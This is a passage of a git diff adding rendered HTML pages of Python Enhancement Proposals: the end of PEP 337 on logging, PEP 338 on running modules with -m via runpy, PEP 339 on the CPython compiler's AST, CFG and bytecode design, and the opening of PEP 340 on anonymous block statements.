  • +
+

Finally possibly some modules should be extended to provide more +debug information.

+
+
+

Doubtful Modules

+

Listed here are modules that the community will propose for +addition to the module list and modules that the community say +should be removed from the module list.

+
    +
  • tabnanny (check)
  • +
+
+
+

Guidelines for Logging Usage

+

Also we can provide some recommendation to authors of library +modules so they all follow the same format of naming loggers. I +propose that non-standard library modules should use loggers named +after their full names, so a module “spam” in sub-package “junk” +of package “dummy” will be named “dummy.junk.spam” and, of course, +the __init__ module of the same sub-package will have the logger +name “dummy.junk”.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0337.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0338/index.html b/pep-0338/index.html new file mode 100644 index 00000000000..3ab02827595 --- /dev/null +++ b/pep-0338/index.html @@ -0,0 +1,412 @@ + + + + + + + + PEP 338 – Executing modules as scripts | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 338 – Executing modules as scripts

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Oct-2004
+
Python-Version:
+
2.5
+
Post-History:
+
08-Nov-2004, 11-Feb-2006, 12-Feb-2006, 18-Feb-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP defines semantics for executing any Python module as a +script, either with the -m command line switch, or by invoking +it via runpy.run_module(modulename).

+

The -m switch implemented in Python 2.4 is quite limited. This +PEP proposes making use of the PEP 302 import hooks to allow any +module which provides access to its code object to be executed.

+
+
+

Rationale

+

Python 2.4 adds the command line switch -m to allow modules to be +located using the Python module namespace for execution as scripts. +The motivating examples were standard library modules such as pdb +and profile, and the Python 2.4 implementation is fine for this +limited purpose.

+

A number of users and developers have requested extension of the +feature to also support running modules located inside packages. One +example provided is pychecker’s pychecker.checker module. This +capability was left out of the Python 2.4 implementation because the +implementation of this was significantly more complicated, and the most +appropriate strategy was not at all clear.

+

The opinion on python-dev was that it was better to postpone the +extension to Python 2.5, and go through the PEP process to help make +sure we got it right.

+

Since that time, it has also been pointed out that the current version +of -m does not support zipimport or any other kind of +alternative import behaviour (such as frozen modules).

+

Providing this functionality as a Python module is significantly easier +than writing it in C, and makes the functionality readily available to +all Python programs, rather than being specific to the CPython +interpreter. CPython’s command line switch can then be rewritten to +make use of the new module.

+

Scripts which execute other scripts (e.g. profile, pdb) also +have the option to use the new module to provide -m style support +for identifying the script to be executed.

+
+
+

Scope of this proposal

+

In Python 2.4, a module located using -m is executed just as if +its filename had been provided on the command line. The goal of this +PEP is to get as close as possible to making that statement also hold +true for modules inside packages, or accessed via alternative import +mechanisms (such as zipimport).

+

Prior discussions suggest it should be noted that this PEP is not +about changing the idiom for making Python modules also useful as +scripts (see PEP 299). That issue is considered orthogonal to the +specific feature addressed by this PEP.

+
+
+

Current Behaviour

+

Before describing the new semantics, it’s worth covering the existing +semantics for Python 2.4 (as they are currently defined only by the +source code and the command line help).

+

When -m is used on the command line, it immediately terminates the +option list (like -c). The argument is interpreted as the name of +a top-level Python module (i.e. one which can be found on +sys.path).

+

If the module is found, and is of type PY_SOURCE or +PY_COMPILED, then the command line is effectively reinterpreted +from python <options> -m <module> <args> to python <options> +<filename> <args>. This includes setting sys.argv[0] correctly +(some scripts rely on this - Python’s own regrtest.py is one +example).

+

If the module is not found, or is not of the correct type, an error +is printed.

+
+
+

Proposed Semantics

+

The semantics proposed are fairly simple: if -m is used to execute +a module the PEP 302 import mechanisms are used to locate the module and +retrieve its compiled code, before executing the module in accordance +with the semantics for a top-level module. The interpreter does this by +invoking a new standard library function runpy.run_module.

+

This is necessary due to the way Python’s import machinery locates +modules inside packages. A package may modify its own __path__ +variable during initialisation. In addition, paths may be affected by +*.pth files, and some packages will install custom loaders on +sys.metapath. Accordingly, the only way for Python to reliably +locate the module is by importing the containing package and +using the PEP 302 import hooks to gain access to the Python code.

+

Note that the process of locating the module to be executed may require +importing the containing package. The effects of such a package import +that will be visible to the executed module are:

+
    +
  • the containing package will be in sys.modules
  • +
  • any external effects of the package initialisation (e.g. installed +import hooks, loggers, atexit handlers, etc.)
  • +
+
+
+

Reference Implementation

+

A reference implementation is available on SourceForge ([2]), along +with documentation for the library reference ([5]). There are +two parts to this implementation. The first is a proposed standard +library module runpy. The second is a modification to the code +implementing the -m switch to always delegate to +runpy.run_module instead of trying to run the module directly. +The delegation has the form:

+
runpy.run_module(sys.argv[0], run_name="__main__", alter_sys=True)
+
+
+

run_module is the only function runpy exposes in its public API.

+

run_module(mod_name[, init_globals][, run_name][, alter_sys])

+
+
Execute the code of the specified module and return the resulting +module globals dictionary. The module’s code is first located using +the standard import mechanism (refer to PEP 302 for details) and +then executed in a fresh module namespace.

The optional dictionary argument init_globals may be used to +pre-populate the globals dictionary before the code is executed. +The supplied dictionary will not be modified. If any of the special +global variables below are defined in the supplied dictionary, those +definitions are overridden by the run_module function.

+

The special global variables __name__, __file__, +__loader__ and __builtins__ are set in the globals dictionary +before the module code is executed.

+

__name__ is set to run_name if this optional argument is +supplied, and the original mod_name argument otherwise.

+

__loader__ is set to the PEP 302 module loader used to retrieve +the code for the module (This loader may be a wrapper around the +standard import mechanism).

+

__file__ is set to the name provided by the module loader. If +the loader does not make filename information available, this +argument is set to None.

+

__builtins__ is automatically initialised with a reference to +the top level namespace of the __builtin__ module.

+

If the argument alter_sys is supplied and evaluates to True, +then sys.argv[0] is updated with the value of __file__ +and sys.modules[__name__] is updated with a temporary module +object for the module being executed. Both sys.argv[0] and +sys.modules[__name__] are restored to their original values +before this function returns.

+
+

When invoked as a script, the runpy module finds and executes the +module supplied as the first argument. It adjusts sys.argv by +deleting sys.argv[0] (which refers to the runpy module itself) +and then invokes run_module(sys.argv[0], run_name="__main__", +alter_sys=True).

+
+
+

Import Statements and the Main Module

+

The release of 2.5b1 showed a surprising (although obvious in +retrospect) interaction between this PEP and PEP 328 - explicit +relative imports don’t work from a main module. This is due to +the fact that relative imports rely on __name__ to determine +the current module’s position in the package hierarchy. In a main +module, the value of __name__ is always '__main__', so +explicit relative imports will always fail (as they only work for +a module inside a package).

+

Investigation into why implicit relative imports appear to work when +a main module is executed directly but fail when executed using -m +showed that such imports are actually always treated as absolute +imports. Because of the way direct execution works, the package +containing the executed module is added to sys.path, so its sibling +modules are actually imported as top level modules. This can easily +lead to multiple copies of the sibling modules in the application if +implicit relative imports are used in modules that may be directly +executed (e.g. test modules or utility scripts).

+

For the 2.5 release, the recommendation is to always use absolute +imports in any module that is intended to be used as a main module. +The -m switch provides a benefit here, as it inserts the current +directory into sys.path, instead of the directory contain the main +module. This means that it is possible to run a module from inside a +package using -m so long as the current directory contains the top +level directory for the package. Absolute imports will work correctly +even if the package isn’t installed anywhere else on sys.path. If the +module is executed directly and uses absolute imports to retrieve its +sibling modules, then the top level package directory needs to be +installed somewhere on sys.path (since the current directory won’t be +added automatically).

+

Here’s an example file layout:

+
devel/
+    pkg/
+        __init__.py
+        moduleA.py
+        moduleB.py
+        test/
+            __init__.py
+            test_A.py
+            test_B.py
+
+
+

So long as the current directory is devel, or devel is already +on sys.path and the test modules use absolute imports (such as +import pkg moduleA to retrieve the module under test, PEP 338 +allows the tests to be run as:

+
python -m pkg.test.test_A
+python -m pkg.test.test_B
+
+
+

The question of whether or not relative imports should be supported +when a main module is executed with -m is something that will be +revisited for Python 2.6. Permitting it would require changes to +either Python’s import semantics or the semantics used to indicate +when a module is the main module, so it is not a decision to be made +hastily.

+
+
+

Resolved Issues

+

There were some key design decisions that influenced the development of +the runpy module. These are listed below.

+
    +
  • The special variables __name__, __file__ and __loader__ +are set in a module’s global namespace before the module is executed. +As run_module alters these values, it does not mutate the +supplied dictionary. If it did, then passing globals() to this +function could have nasty side effects.
  • +
  • Sometimes, the information needed to populate the special variables +simply isn’t available. Rather than trying to be too clever, these +variables are simply set to None when the relevant information +cannot be determined.
  • +
  • There is no special protection on the alter_sys argument. +This may result in sys.argv[0] being set to None if file +name information is not available.
  • +
  • The import lock is NOT used to avoid potential threading issues that +arise when alter_sys is set to True. Instead, it is recommended that +threaded code simply avoid using this flag.
  • +
+
+
+

Alternatives

+

The first alternative implementation considered ignored packages’ +__path__ variables, and looked only in the main package directory. A +Python script with this behaviour can be found in the discussion of +the execmodule cookbook recipe [3].

+

The execmodule cookbook recipe itself was the proposed mechanism in +an earlier version of this PEP (before the PEP’s author read PEP 302).

+

Both approaches were rejected as they do not meet the main goal of the +-m switch – to allow the full Python namespace to be used to +locate modules for execution from the command line.

+

An earlier version of this PEP included some mistaken assumptions +about the way exec handled locals dictionaries and code from +function objects. These mistaken assumptions led to some unneeded +design complexity which has now been removed - run_code shares all +of the quirks of exec.

+

Earlier versions of the PEP also exposed a broader API that just the +single run_module() function needed to implement the updates to +the -m switch. In the interests of simplicity, those extra functions +have been dropped from the proposed API.

+

After the original implementation in SVN, it became clear that holding +the import lock when executing the initial application script was not +correct (e.g. python -m test.regrtest test_threadedimport failed). +So the run_module function only holds the import lock during the +actual search for the module, and releases it before execution, even if +alter_sys is set.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0338.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0339/index.html b/pep-0339/index.html new file mode 100644 index 00000000000..e7cca5e2930 --- /dev/null +++ b/pep-0339/index.html @@ -0,0 +1,720 @@ + + + + + + + + PEP 339 – Design of the CPython Compiler | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 339 – Design of the CPython Compiler

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
02-Feb-2005
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been withdrawn and moved to the Python +developer’s guide.

+
+
+

Abstract

+

Historically (through 2.4), compilation from source code to bytecode +involved two steps:

+
    +
  1. Parse the source code into a parse tree (Parser/pgen.c)
  2. +
  3. Emit bytecode based on the parse tree (Python/compile.c)
  4. +
+

Historically, this is not how a standard compiler works. The usual +steps for compilation are:

+
    +
  1. Parse source code into a parse tree (Parser/pgen.c)
  2. +
  3. Transform parse tree into an Abstract Syntax Tree (Python/ast.c)
  4. +
  5. Transform AST into a Control Flow Graph (Python/compile.c)
  6. +
  7. Emit bytecode based on the Control Flow Graph (Python/compile.c)
  8. +
+

Starting with Python 2.5, the above steps are now used. This change +was done to simplify compilation by breaking it into three steps. +The purpose of this document is to outline how the latter three steps +of the process works.

+

This document does not touch on how parsing works beyond what is needed +to explain what is needed for compilation. It is also not exhaustive +in terms of the how the entire system works. You will most likely need +to read some source to have an exact understanding of all details.

+
+
+

Parse Trees

+

Python’s parser is an LL(1) parser mostly based on the +implementation laid out in the Dragon Book [Aho86].

+

The grammar file for Python can be found in Grammar/Grammar with the +numeric value of grammar rules are stored in Include/graminit.h. The +numeric values for types of tokens (literal tokens, such as :, +numbers, etc.) are kept in Include/token.h). The parse tree made up of +node * structs (as defined in Include/node.h).

+

Querying data from the node structs can be done with the following +macros (which are all defined in Include/token.h):

+
    +
  • +
    CHILD(node *, int)
    Returns the nth child of the node using zero-offset indexing
    +
    +
  • +
  • +
    RCHILD(node *, int)
    Returns the nth child of the node from the right side; use +negative numbers!
    +
    +
  • +
  • +
    NCH(node *)
    Number of children the node has
    +
    +
  • +
  • +
    STR(node *)
    String representation of the node; e.g., will return : for a +COLON token
    +
    +
  • +
  • +
    TYPE(node *)
    The type of node as specified in Include/graminit.h
    +
    +
  • +
  • +
    REQ(node *, TYPE)
    Assert that the node is the type that is expected
    +
    +
  • +
  • +
    LINENO(node *)
    retrieve the line number of the source code that led to the +creation of the parse rule; defined in Python/ast.c
    +
    +
  • +
+

To tie all of this example, consider the rule for ‘while’:

+
while_stmt: 'while' test ':' suite ['else' ':' suite]
+
+
+

The node representing this will have TYPE(node) == while_stmt and +the number of children can be 4 or 7 depending on if there is an ‘else’ +statement. To access what should be the first ‘:’ and require it be an +actual ‘:’ token, (REQ(CHILD(node, 2), COLON).

+
+
+

Abstract Syntax Trees (AST)

+

The abstract syntax tree (AST) is a high-level representation of the +program structure without the necessity of containing the source code; +it can be thought of as an abstract representation of the source code. The +specification of the AST nodes is specified using the Zephyr Abstract +Syntax Definition Language (ASDL) [Wang97].

+

The definition of the AST nodes for Python is found in the file +Parser/Python.asdl .

+

Each AST node (representing statements, expressions, and several +specialized types, like list comprehensions and exception handlers) is +defined by the ASDL. Most definitions in the AST correspond to a +particular source construct, such as an ‘if’ statement or an attribute +lookup. The definition is independent of its realization in any +particular programming language.

+

The following fragment of the Python ASDL construct demonstrates the +approach and syntax:

+
module Python
+{
+      stmt = FunctionDef(identifier name, arguments args, stmt* body,
+                          expr* decorators)
+            | Return(expr? value) | Yield(expr value)
+            attributes (int lineno)
+}
+
+
+

The preceding example describes three different kinds of statements; +function definitions, return statements, and yield statements. All +three kinds are considered of type stmt as shown by ‘|’ separating the +various kinds. They all take arguments of various kinds and amounts.

+

Modifiers on the argument type specify the number of values needed; ‘?’ +means it is optional, ‘*’ means 0 or more, no modifier means only one +value for the argument and it is required. FunctionDef, for instance, +takes an identifier for the name, ‘arguments’ for args, zero or more +stmt arguments for ‘body’, and zero or more expr arguments for +‘decorators’.

+

Do notice that something like ‘arguments’, which is a node type, is +represented as a single AST node and not as a sequence of nodes as with +stmt as one might expect.

+

All three kinds also have an ‘attributes’ argument; this is shown by the +fact that ‘attributes’ lacks a ‘|’ before it.

+

The statement definitions above generate the following C structure type:

+
typedef struct _stmt *stmt_ty;
+
+struct _stmt {
+      enum { FunctionDef_kind=1, Return_kind=2, Yield_kind=3 } kind;
+      union {
+              struct {
+                      identifier name;
+                      arguments_ty args;
+                      asdl_seq *body;
+              } FunctionDef;
+
+              struct {
+                      expr_ty value;
+              } Return;
+
+              struct {
+                      expr_ty value;
+              } Yield;
+      } v;
+      int lineno;
+ }
+
+
+

Also generated are a series of constructor functions that allocate (in +this case) a stmt_ty struct with the appropriate initialization. The +‘kind’ field specifies which component of the union is initialized. The +FunctionDef() constructor function sets ‘kind’ to FunctionDef_kind and +initializes the ‘name’, ‘args’, ‘body’, and ‘attributes’ fields.

+
+
+

Memory Management

+

Before discussing the actual implementation of the compiler, a discussion of +how memory is handled is in order. To make memory management simple, an arena +is used. This means that a memory is pooled in a single location for easy +allocation and removal. What this gives us is the removal of explicit memory +deallocation. Because memory allocation for all needed memory in the compiler +registers that memory with the arena, a single call to free the arena is all +that is needed to completely free all memory used by the compiler.

+

In general, unless you are working on the critical core of the compiler, memory +management can be completely ignored. But if you are working at either the +very beginning of the compiler or the end, you need to care about how the arena +works. All code relating to the arena is in either Include/pyarena.h or +Python/pyarena.c .

+

PyArena_New() will create a new arena. The returned PyArena structure will +store pointers to all memory given to it. This does the bookkeeping of what +memory needs to be freed when the compiler is finished with the memory it used. +That freeing is done with PyArena_Free(). This needs to only be called in +strategic areas where the compiler exits.

+

As stated above, in general you should not have to worry about memory +management when working on the compiler. The technical details have been +designed to be hidden from you for most cases.

+

The only exception comes about when managing a PyObject. Since the rest +of Python uses reference counting, there is extra support added +to the arena to cleanup each PyObject that was allocated. These cases +are very rare. However, if you’ve allocated a PyObject, you must tell +the arena about it by calling PyArena_AddPyObject().

+
+
+

Parse Tree to AST

+

The AST is generated from the parse tree (see Python/ast.c) using the +function PyAST_FromNode().

+

The function begins a tree walk of the parse tree, creating various AST +nodes as it goes along. It does this by allocating all new nodes it +needs, calling the proper AST node creation functions for any required +supporting functions, and connecting them as needed.

+

Do realize that there is no automated nor symbolic connection between +the grammar specification and the nodes in the parse tree. No help is +directly provided by the parse tree as in yacc.

+

For instance, one must keep track of which node in the parse tree +one is working with (e.g., if you are working with an ‘if’ statement +you need to watch out for the ‘:’ token to find the end of the conditional).

+

The functions called to generate AST nodes from the parse tree all have +the name ast_for_xx where xx is what the grammar rule that the function +handles (alias_for_import_name is the exception to this). These in turn +call the constructor functions as defined by the ASDL grammar and +contained in Python/Python-ast.c (which was generated by +Parser/asdl_c.py) to create the nodes of the AST. This all leads to a +sequence of AST nodes stored in asdl_seq structs.

+

Function and macros for creating and using asdl_seq * types as found +in Python/asdl.c and Include/asdl.h:

+
    +
  • +
    asdl_seq_new()
    Allocate memory for an asdl_seq for the specified length
    +
    +
  • +
  • +
    asdl_seq_GET()
    Get item held at a specific position in an asdl_seq
    +
    +
  • +
  • +
    asdl_seq_SET()
    Set a specific index in an asdl_seq to the specified value
    +
    +
  • +
  • +
    asdl_seq_LEN(asdl_seq *)
    Return the length of an asdl_seq
    +
    +
  • +
+

If you are working with statements, you must also worry about keeping +track of what line number generated the statement. Currently the line +number is passed as the last parameter to each stmt_ty function.

+
+
+

Control Flow Graphs

+

A control flow graph (often referenced by its acronym, CFG) is a +directed graph that models the flow of a program using basic blocks that +contain the intermediate representation (abbreviated “IR”, and in this +case is Python bytecode) within the blocks. Basic blocks themselves are +a block of IR that has a single entry point but possibly multiple exit +points. The single entry point is the key to basic blocks; it all has +to do with jumps. An entry point is the target of something that +changes control flow (such as a function call or a jump) while exit +points are instructions that would change the flow of the program (such +as jumps and ‘return’ statements). What this means is that a basic +block is a chunk of code that starts at the entry point and runs to an +exit point or the end of the block.

+

As an example, consider an ‘if’ statement with an ‘else’ block. The +guard on the ‘if’ is a basic block which is pointed to by the basic +block containing the code leading to the ‘if’ statement. The ‘if’ +statement block contains jumps (which are exit points) to the true body +of the ‘if’ and the ‘else’ body (which may be NULL), each of which are +their own basic blocks. Both of those blocks in turn point to the +basic block representing the code following the entire ‘if’ statement.

+

CFGs are usually one step away from final code output. Code is directly +generated from the basic blocks (with jump targets adjusted based on the +output order) by doing a post-order depth-first search on the CFG +following the edges.

+
+
+

AST to CFG to Bytecode

+

With the AST created, the next step is to create the CFG. The first step +is to convert the AST to Python bytecode without having jump targets +resolved to specific offsets (this is calculated when the CFG goes to +final bytecode). Essentially, this transforms the AST into Python +bytecode with control flow represented by the edges of the CFG.

+

Conversion is done in two passes. The first creates the namespace +(variables can be classified as local, free/cell for closures, or +global). With that done, the second pass essentially flattens the CFG +into a list and calculates jump offsets for final output of bytecode.

+

The conversion process is initiated by a call to the function +PyAST_Compile() in Python/compile.c . This function does both the +conversion of the AST to a CFG and +outputting final bytecode from the CFG. The AST to CFG step is handled +mostly by two functions called by PyAST_Compile(); PySymtable_Build() and +compiler_mod() . The former is in Python/symtable.c while the latter is in +Python/compile.c .

+

PySymtable_Build() begins by entering the starting code block for the +AST (passed-in) and then calling the proper symtable_visit_xx function +(with xx being the AST node type). Next, the AST tree is walked with +the various code blocks that delineate the reach of a local variable +as blocks are entered and exited using symtable_enter_block() and +symtable_exit_block(), respectively.

+

Once the symbol table is created, it is time for CFG creation, whose +code is in Python/compile.c . This is handled by several functions +that break the task down by various AST node types. The functions are +all named compiler_visit_xx where xx is the name of the node type (such +as stmt, expr, etc.). Each function receives a struct compiler * +and xx_ty where xx is the AST node type. Typically these functions +consist of a large ‘switch’ statement, branching based on the kind of +node type passed to it. Simple things are handled inline in the +‘switch’ statement with more complex transformations farmed out to other +functions named compiler_xx with xx being a descriptive name of what is +being handled.

+

When transforming an arbitrary AST node, use the VISIT() macro. +The appropriate compiler_visit_xx function is called, based on the value +passed in for <node type> (so VISIT(c, expr, node) calls +compiler_visit_expr(c, node)). The VISIT_SEQ macro is very similar, +but is called on AST node sequences (those values that were created as +arguments to a node that used the ‘*’ modifier). There is also +VISIT_SLICE() just for handling slices.

+

Emission of bytecode is handled by the following macros:

+
    +
  • +
    ADDOP()
    add a specified opcode
    +
    +
  • +
  • +
    ADDOP_I()
    add an opcode that takes an argument
    +
    +
  • +
  • +
    ADDOP_O(struct compiler *c, int op, PyObject *type, PyObject *obj)
    add an opcode with the proper argument based on the position of the +specified PyObject in PyObject sequence object, but with no handling of +mangled names; used for when you +need to do named lookups of objects such as globals, consts, or +parameters where name mangling is not possible and the scope of the +name is known
    +
    +
  • +
  • +
    ADDOP_NAME()
    just like ADDOP_O, but name mangling is also handled; used for +attribute loading or importing based on name
    +
    +
  • +
  • +
    ADDOP_JABS()
    create an absolute jump to a basic block
    +
    +
  • +
  • +
    ADDOP_JREL()
    create a relative jump to a basic block
    +
    +
  • +
+

Several helper functions that will emit bytecode and are named +compiler_xx() where xx is what the function helps with (list, boolop, +etc.). A rather useful one is compiler_nameop(). +This function looks up the scope of a variable and, based on the +expression context, emits the proper opcode to load, store, or delete +the variable.

+

As for handling the line number on which a statement is defined, is +handled by compiler_visit_stmt() and thus is not a worry.

+

In addition to emitting bytecode based on the AST node, handling the +creation of basic blocks must be done. Below are the macros and +functions used for managing basic blocks:

+
    +
  • +
    NEW_BLOCK()
    create block and set it as current
    +
    +
  • +
  • +
    NEXT_BLOCK()
    basically NEW_BLOCK() plus jump from current block
    +
    +
  • +
  • +
    compiler_new_block()
    create a block but don’t use it (used for generating jumps)
    +
    +
  • +
+

Once the CFG is created, it must be flattened and then final emission of +bytecode occurs. Flattening is handled using a post-order depth-first +search. Once flattened, jump offsets are backpatched based on the +flattening and then a PyCodeObject file is created. All of this is +handled by calling assemble() .

+
+
+

Introducing New Bytecode

+

Sometimes a new feature requires a new opcode. But adding new bytecode is +not as simple as just suddenly introducing new bytecode in the AST -> +bytecode step of the compiler. Several pieces of code throughout Python depend +on having correct information about what bytecode exists.

+

First, you must choose a name and a unique identifier number. The official +list of bytecode can be found in Include/opcode.h . If the opcode is to take +an argument, it must be given a unique number greater than that assigned to +HAVE_ARGUMENT (as found in Include/opcode.h).

+

Once the name/number pair +has been chosen and entered in Include/opcode.h, you must also enter it into +Lib/opcode.py and Doc/library/dis.rst .

+

With a new bytecode you must also change what is called the magic number for +.pyc files. The variable MAGIC in Python/import.c contains the number. +Changing this number will lead to all .pyc files with the old MAGIC +to be recompiled by the interpreter on import.

+

Finally, you need to introduce the use of the new bytecode. Altering +Python/compile.c and Python/ceval.c will be the primary places to change. +But you will also need to change the ‘compiler’ package. The key files +to do that are Lib/compiler/pyassem.py and Lib/compiler/pycodegen.py .

+

If you make a change here that can affect the output of bytecode that +is already in existence and you do not change the magic number constantly, make +sure to delete your old .py(c|o) files! Even though you will end up changing +the magic number if you change the bytecode, while you are debugging your work +you will be changing the bytecode output without constantly bumping up the +magic number. This means you end up with stale .pyc files that will not be +recreated. Running +find . -name '*.py[co]' -exec rm -f {} ';' should delete all .pyc files you +have, forcing new ones to be created and thus allow you test out your new +bytecode properly.

+
+
+

Code Objects

+

The result of PyAST_Compile() is a PyCodeObject which is defined in +Include/code.h . And with that you now have executable Python bytecode!

+

The code objects (byte code) is executed in Python/ceval.c . This file +will also need a new case statement for the new opcode in the big switch +statement in PyEval_EvalFrameEx().

+
+
+

Important Files

+
    +
  • Parser/
      +
    • +
      Python.asdl
      ASDL syntax file
      +
      +
    • +
    • +
      asdl.py
      “An implementation of the Zephyr Abstract Syntax Definition +Language.” Uses SPARK to parse the ASDL files.
      +
      +
    • +
    • +
      asdl_c.py
      “Generate C code from an ASDL description.” Generates +Python/Python-ast.c and Include/Python-ast.h .
      +
      +
    • +
    • +
      spark.py
      SPARK parser generator
      +
      +
    • +
    +
  • +
  • Python/
      +
    • +
      Python-ast.c
      Creates C structs corresponding to the ASDL types. Also +contains code for marshaling AST nodes (core ASDL types have +marshaling code in asdl.c). “File automatically generated by +Parser/asdl_c.py”. This file must be committed separately +after every grammar change is committed since the __version__ +value is set to the latest grammar change revision number.
      +
      +
    • +
    • +
      asdl.c
      Contains code to handle the ASDL sequence type. Also has code +to handle marshalling the core ASDL types, such as number and +identifier. used by Python-ast.c for marshaling AST nodes.
      +
      +
    • +
    • +
      ast.c
      Converts Python’s parse tree into the abstract syntax tree.
      +
      +
    • +
    • +
      ceval.c
      Executes byte code (aka, eval loop).
      +
      +
    • +
    • +
      compile.c
      Emits bytecode based on the AST.
      +
      +
    • +
    • +
      symtable.c
      Generates a symbol table from AST.
      +
      +
    • +
    • +
      pyarena.c
      Implementation of the arena memory manager.
      +
      +
    • +
    • +
      import.c
      Home of the magic number (named MAGIC) for bytecode versioning
      +
      +
    • +
    +
  • +
  • Include/
      +
    • +
      Python-ast.h
      Contains the actual definitions of the C structs as generated by +Python/Python-ast.c . +“Automatically generated by Parser/asdl_c.py”.
      +
      +
    • +
    • +
      asdl.h
      Header for the corresponding Python/ast.c .
      +
      +
    • +
    • +
      ast.h
      Declares PyAST_FromNode() external (from Python/ast.c).
      +
      +
    • +
    • +
      code.h
      Header file for Objects/codeobject.c; contains definition of +PyCodeObject.
      +
      +
    • +
    • +
      symtable.h
      Header for Python/symtable.c . struct symtable and +PySTEntryObject are defined here.
      +
      +
    • +
    • +
      pyarena.h
      Header file for the corresponding Python/pyarena.c .
      +
      +
    • +
    • +
      opcode.h
      Master list of bytecode; if this file is modified you must modify +several other files accordingly (see “Introducing New Bytecode”)
      +
      +
    • +
    +
  • +
  • Objects/
      +
    • +
      codeobject.c
      Contains PyCodeObject-related code (originally in +Python/compile.c).
      +
      +
    • +
    +
  • +
  • Lib/
      +
    • +
      opcode.py
      One of the files that must be modified if Include/opcode.h is.
      +
      +
    • +
    • compiler/
        +
      • +
        pyassem.py
        One of the files that must be modified if Include/opcode.h is +changed.
        +
        +
      • +
      • +
        pycodegen.py
        One of the files that must be modified if Include/opcode.h is +changed.
        +
        +
      • +
      +
    • +
    +
  • +
+
+ +
+

References

+
+
+
[Aho86]
+
Alfred V. Aho, Ravi Sethi, Jeffrey D. Ullman. +Compilers: Principles, Techniques, and Tools, +http://www.amazon.com/exec/obidos/tg/detail/-/0201100886/104-0162389-6419108
+
+
[Wang97]
+
Daniel C. Wang, Andrew W. Appel, Jeff L. Korn, and Chris +S. Serra. The Zephyr Abstract Syntax Description Language. +In Proceedings of the Conference on Domain-Specific Languages, pp. +213–227, 1997.
+
+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0339.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0340/index.html b/pep-0340/index.html new file mode 100644 index 00000000000..2561d2087b2 --- /dev/null +++ b/pep-0340/index.html @@ -0,0 +1,671 @@ + + + + + + + + PEP 340 – Anonymous Block Statements | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 340 – Anonymous Block Statements

+
+
Author:
+
Guido van Rossum
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
27-Apr-2005
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP proposes a new type of compound statement which can be +used for resource management purposes. The new statement type +is provisionally called the block-statement because the keyword +to be used has not yet been chosen.

+

This PEP competes with several other PEPs: PEP 288 (Generators +Attributes and Exceptions; only the second part), PEP 310 +(Reliable Acquisition/Release Pairs), and PEP 325 +(Resource-Release Support for Generators).

+

I should clarify that using a generator to “drive” a block +statement is really a separable proposal; with just the definition +of the block statement from the PEP you could implement all the +examples using a class (similar to example 6, which is easily +turned into a template). But the key idea is using a generator to +drive a block statement; the rest is elaboration, so I’d like to +keep these two parts together.

+

(PEP 342, Enhanced Iterators, was originally a part of this PEP; +but the two proposals are really independent and with Steven +Bethard’s help I have moved it to a separate PEP.)

+
+
+

Rejection Notice

+

I am rejecting this PEP in favor of PEP 343. See the motivational +section in that PEP for the reasoning behind this rejection. GvR.

+
+
+

Motivation and Summary

+

(Thanks to Shane Hathaway – Hi Shane!)

+

Good programmers move commonly used code into reusable functions. +Sometimes, however, patterns arise in the structure of the +functions rather than the actual sequence of statements. For +example, many functions acquire a lock, execute some code specific +to that function, and unconditionally release the lock. Repeating +the locking code in every function that uses it is error prone and +makes refactoring difficult.

+

Block statements provide a mechanism for encapsulating patterns of +structure. Code inside the block statement runs under the control +of an object called a block iterator. Simple block iterators +execute code before and after the code inside the block statement. +Block iterators also have the opportunity to execute the +controlled code more than once (or not at all), catch exceptions, +or receive data from the body of the block statement.

+

A convenient way to write block iterators is to write a generator +(PEP 255). A generator looks a lot like a Python function, but +instead of returning a value immediately, generators pause their +execution at “yield” statements. When a generator is used as a +block iterator, the yield statement tells the Python interpreter +to suspend the block iterator, execute the block statement body, +and resume the block iterator when the body has executed.

+

The Python interpreter behaves as follows when it encounters a +block statement based on a generator. First, the interpreter +instantiates the generator and begins executing it. The generator +does setup work appropriate to the pattern it encapsulates, such +as acquiring a lock, opening a file, starting a database +transaction, or starting a loop. Then the generator yields +execution to the body of the block statement using a yield +statement. When the block statement body completes, raises an +uncaught exception, or sends data back to the generator using a +continue statement, the generator resumes. At this point, the +generator can either clean up and stop or yield again, causing the +block statement body to execute again. When the generator +finishes, the interpreter leaves the block statement.

+
+
+

Use Cases

+

See the Examples section near the end.

+
+
+

Specification: the __exit__() Method

+

An optional new method for iterators is proposed, called +__exit__(). It takes up to three arguments which correspond to +the three “arguments” to the raise-statement: type, value, and +traceback. If all three arguments are None, sys.exc_info() may be +consulted to provide suitable default values.

+
+
+

Specification: the Anonymous Block Statement

+

A new statement is proposed with the syntax:

+
block EXPR1 as VAR1:
+    BLOCK1
+
+
+

